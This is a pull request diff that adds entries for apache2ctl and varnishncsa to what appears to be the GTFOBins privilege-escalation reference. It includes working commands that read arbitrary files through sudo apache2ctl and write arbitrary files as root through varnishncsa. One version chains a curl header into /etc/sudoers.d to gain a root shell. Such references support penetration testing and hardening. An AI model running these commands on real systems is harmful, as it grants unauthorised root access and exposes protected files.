### PR TITLE
Add varnishncsa & apache2ctl

### DIFF
--- a/_gtfobins/apache2ctl.md
+++ b/_gtfobins/apache2ctl.md
@@ -1,16 +1,12 @@
 ---
-description: apache2ctl is a front end to the Apache HyperText Transfer Protocol (HTTP) server. It is designed to help the administrator control the functioning of the Apache apache2 daemon.
+description: This includes the file in the actual configuration file, the first line is leaked as an error message.
 functions:
-    file-read:
-        - code: cp -r /etc/apache2/ /tmp/apache2
-        - code: |
-            LFILE=file_to_read
-            echo "Include $LFILE" >> /tmp/apache2/apache2.conf
-        - code: apache2ctl -d /tmp/apache2 -k restart
-    sudo:
-        - code: cp -r /etc/apache2/ /tmp/apache2
-        - code: |
-            LFILE=file_to_read
-            echo "Include $LFILE" >> /tmp/apache2/apache2.conf
-        - code: sudo apache2ctl -d /tmp/apache2 -k restart
+  file-read:
+    - code: |
+        LFILE=file_to_read
+        apache2ctl -c "Include $LFILE" -k stop
+  sudo:
+    - code: |
+        LFILE=file_to_read
+        sudo apache2ctl -c "Include $LFILE" -k stop
 ---

--- a/_gtfobins/apache2ctl.md
+++ b/_gtfobins/apache2ctl.md
@@ -1,0 +1,16 @@
+---
+description: apache2ctl is a front end to the Apache HyperText Transfer Protocol (HTTP) server. It is designed to help the administrator control the functioning of the Apache apache2 daemon.
+functions:
+    file-read:
+        - code: cp -r /etc/apache2/ /tmp/apache2
+        - code: |
+            LFILE=file_to_read
+            echo "Include $LFILE" >> /tmp/apache2/apache2.conf
+        - code: apache2ctl -d /tmp/apache2 -k restart
+    sudo:
+        - code: cp -r /etc/apache2/ /tmp/apache2
+        - code: |
+            LFILE=file_to_read
+            echo "Include $LFILE" >> /tmp/apache2/apache2.conf
+        - code: sudo apache2ctl -d /tmp/apache2 -k restart
+---

--- a/_gtfobins/varnishncsa.md
+++ b/_gtfobins/varnishncsa.md
@@ -1,8 +1,18 @@
 ---
-description: varnishncsa utility reads varnishd shared memory Varnish logs and presents them in the Apache / NCSA "combined" log format.
+description: |
+  This allows to write arbitrary files as root, provided that the proper HTTP response is made. Specifically the content of a certain header will be written in the file. First start `varnishncsa` as follows, then trigger the file write with:
+
+  ```
+  curl -H 'yyy: DATA' http://localhost:6081/xxx
+  ```
+description: 
 functions:
-    sudo:
-        - code: sudo varnishncsa -g request -q "ReqURL ~ \"/exploit_randomfoo\"" -F '%{exploit}i' -w /etc/sudoers.d/user &
-        - code: curl -H 'exploit: user ALL = (ALL) NOPASSWD: ALL' localhost:6081/exploit_randomfoo
-        - code: sudo bash
+  sudo:
+    code: |
+      LFILE=file_to_write
+      sudo varnishncsa -g request -q 'ReqURL ~ "/xxx"' -F '%{yyy}i' -w "$LFILE"
+  suid:
+    code: |
+      LFILE=file_to_write
+      ./varnishncsa -g request -q 'ReqURL ~ "/xxx"' -F '%{yyy}i' -w "$LFILE"
 ---

--- a/_gtfobins/varnishncsa.md
+++ b/_gtfobins/varnishncsa.md
@@ -7,11 +7,11 @@ description: |
   ```
 functions:
   sudo:
-    code: |
-      LFILE=file_to_write
-      sudo varnishncsa -g request -q 'ReqURL ~ "/xxx"' -F '%{yyy}i' -w "$LFILE"
+    - code: |
+        LFILE=file_to_write
+        sudo varnishncsa -g request -q 'ReqURL ~ "/xxx"' -F '%{yyy}i' -w "$LFILE"
   suid:
-    code: |
-      LFILE=file_to_write
-      ./varnishncsa -g request -q 'ReqURL ~ "/xxx"' -F '%{yyy}i' -w "$LFILE"
+    - code: |
+        LFILE=file_to_write
+        ./varnishncsa -g request -q 'ReqURL ~ "/xxx"' -F '%{yyy}i' -w "$LFILE"
 ---

--- a/_gtfobins/varnishncsa.md
+++ b/_gtfobins/varnishncsa.md
@@ -5,7 +5,6 @@ description: |
   ```
   curl -H 'yyy: DATA' http://localhost:6081/xxx
   ```
-description: 
 functions:
   sudo:
     code: |

--- a/_gtfobins/varnishncsa.md
+++ b/_gtfobins/varnishncsa.md
@@ -1,0 +1,8 @@
+---
+description: varnishncsa utility reads varnishd shared memory Varnish logs and presents them in the Apache / NCSA "combined" log format.
+functions:
+    sudo:
+        - code: sudo varnishncsa -g request -q "ReqURL ~ \"/exploit_randomfoo\"" -F '%{exploit}i' -w /etc/sudoers.d/user &
+        - code: curl -H 'exploit: user ALL = (ALL) NOPASSWD: ALL' localhost:6081/exploit_randomfoo
+        - code: sudo bash
+---


### PR DESCRIPTION
This commit adds 2 files (_gtfobins/apache2ctl.md and _gtfobins/varnishncsa.md) containing privilege escalation methods for the varnishncsa and apache2ctl utilities.